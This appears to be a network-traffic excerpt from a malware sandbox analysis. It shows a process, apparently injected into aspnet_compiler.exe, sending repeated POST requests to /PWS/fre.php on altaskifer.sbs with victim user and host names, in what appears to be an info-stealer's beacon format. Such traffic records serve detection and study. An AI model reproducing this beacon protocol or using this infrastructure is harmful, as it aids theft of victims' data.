Apr 6, 2024 09:29:52.047920942 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:52.426291943 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXvxEsoq2uHiFTG6y0KzIfAQ4PaiUOF%2B2l8XKYyuFbQMOcpj6cVSr9iV7YMEsyMLc%2F0C%2FfrIJLlSI%2Fsi%2FAoNjqWFlxl75VKaowJr1SiAFazauaXI95pEeREKKO4D7WLEdg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011bbe9f78dac-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	49757	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:52.706701040 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:52.831208944 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:53.204463959 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdVSgMhGj1pcUmIxcBj7mZL3m0UDsubMCJrwQCdbs1FVrot6kbiKluvGLmQ5pu%2FHi%2FXQoEqyUDwNUeGox%2FM62WTJmLAanTtEGT0G9%2B5WMyt9FmB0wDX%2F9l5jQ380na%2Fbbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011c0d928a558-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49758	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:53.470084906 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:53.595801115 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:53.977397919 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKgDapP8JSaXx2iTlrukWhm5OwI4gu1NXTdiDzxtla4B3YSuaO9FRU0F20FZcCb4DdOOWWCGQTgPgZbBUZ%2FPjUsBfzcQCIzCjXahAvSSmRFjOL9rFeca84vMTE7Mr7GHoQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011c598f7da8b-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49759	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:54.259588003 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:54.383791924 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:54.765850067 CEST	611	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecJkXhLfYbCmlHR9zhHpRGgH%2BmTMGQY2MLHJCHbz9BtssggRKnPCcBRmxGrLO0MM26vcuQe%2BU0dWq%2Bi%2FX707b5GFvH41vA88g%2FLU%2FTA%2B1ACmm4HkCRHDYth%2FBtgjnLxVsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011ca8d2c8dfc-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49760	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:55.035047054 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:55.159293890 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:55.538187027 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etE5AqzPg%2Fp5BABSnOixLhQiwNwr2ja0Le0zwg9pn%2FqX0Ph2oZqf4QKq1Yg6H9tWWhcdeqw1sKqVPEsb09rSnORZexbOONhKYw2%2FLUyu85l8oT39aNMBqs4qidDdI6IzzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011cf59379acf-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49761	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:55.812911034 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:55.937916040 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:56.323726892 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8Ed%2BESZbfYAjg69WiYZEBDfBoTC5GDJLF03VgoYYCxw1dPS6SzLKmKbGOOl2WFflba0va0h56L3ARj7Vmfzu7AUur0uvOjPX5sBbBf5L4FRfDrZpVzubWFHxR0uO6lbmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011d43dd174aa-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49762	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:56.595283031 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:56.719551086 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:57.097526073 CEST	607	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6P5tZWVzpJLz43XaJ%2Fv6b4z5LLormL6XLUnEzmrHipGj74SRxfkpjc3R2jlTsrligntW8tCIC4gK3IlPl2MY2q43b0LMO%2BjRRRd%2B9G%2B%2FeZNxznLnwnAtvWdxsA4se3%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011d91a53a554-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49763	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:57.360186100 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:57.484811068 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:57.853610039 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pkg7WqhsY%2FngyicWhfUGEywdw2q%2BFpwksbpMVdSuvVL3yPSCt0CO7Dxw6v2E6m7uCCwRV6oZX4CjsCDD6U3%2Bdycutv0PHDzZasq8FEmFMVbvXVYGf%2F1aAQgYr4BDWBF4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011ddefb9748d-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49764	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:58.128552914 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:58.252881050 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:58.658344984 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbGcZepgXDQMYEqteHeCKgkBkGe%2F2fcb3CnlbQWgQijbG7ZnbWL2uNl6jw4gMagSJ%2BNn4QJca%2BW5KDWQPOdGqiimrqSUrZkdTBPbUmR6u1TuIP3n2zzGMejhBrgIbx%2B5Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011e2bcc82589-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49765	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:58.921065092 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:59.047959089 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:29:59.422697067 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:29:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQWLx8XDMfgQu0WQ1%2B%2Ft7t1FZZ%2FnSWKuP150IEVE1w3ysz14GeDEkMTjHj6CZMNztYJzFuUHTxBNs2ZgWSWSQohtXtNRH0JOFySOy1Nr%2FEoB11w3vlwzkoT7fDhkvTOeJw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011e7a8b25c7c-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49766	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:29:59.690030098 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:29:59.813829899 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:00.210206985 CEST	603	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gVvu92rPAxY7UifkgQdDlNaXwDRTDHUU%2BmP36BAQetUgps8cw3Fp9ss1zpkWLx3KYBm%2Fk4R%2F77nFGYdH97uCSU3OBcDoiQbfDDjee8NY2SpBHTzQzJIK2cKu0%2BA6dHVZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011ec7cfb8dc6-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49767	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:00.493398905 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:00.617283106 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:01.013169050 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IahZIT4tvxvSLBo5fYqX4ZrCe3sCvTJi%2BY9%2Fi4ArsbwyMaklD3hCfSWqIO1MRYOcjShP2z%2FnOxSUSQn14mD%2FXP7i%2BxCAT8bolqvOr7HmAxuVJF0TjWdfTITENZ7kw3WH4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011f179fb8da8-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49768	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:01.279269934 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:01.403219938 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:01.774059057 CEST	605	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT3YPz6o6szhrf6atFOql9n4tWCLpQKz%2FuAazdDJXFBB4SqHdiDx%2BXoB%2Bl1UzJAdGj9ocpfL5vlEpEn7BgycrrG0nNLi4w7bHmM1Dunn069793GQ%2FalOYh6%2BkZqoEgEo6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011f66ad8a54e-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49769	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:02.046577930 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:02.170840979 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:02.541439056 CEST	601	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6YOvhgdIT6Z2jf9fyoYXsEO778yKErcrSlsXext1rBY%2FC7Yg8YyWdv7vb8356uxWLjksPiHmeWg3HIRuqlAqrQBNL3xCjNU22LHLNV6G%2FsSLTfx59M1XwmVNKg%2FREhIMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011fb38f1747f-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49770	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:02.814836979 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
Apr 6, 2024 09:30:02.938760042 CEST	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
Apr 6, 2024 09:30:03.323903084 CEST	597	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Apr 2024 07:30:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32FYP0NzF%2BSRTmsxJ9ZcUXuF4uIGAblzg4OwZ85L6Foz1lHYScaGbhEMDue3m2tuswaYlVocp0vSltcjMLSln1k7jK2eHuCxvbKYEOsqN21dPl9JDxMYyT8lD0SmM9L8YQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 870011fffa3ea524-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49771	172.67.148.126	80	4596	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Apr 6, 2024 09:30:03.603579044 CEST	238	OUT	POST /PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: altaskifer.sbs Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2FD79934 Content-Length: 161 Connection: close
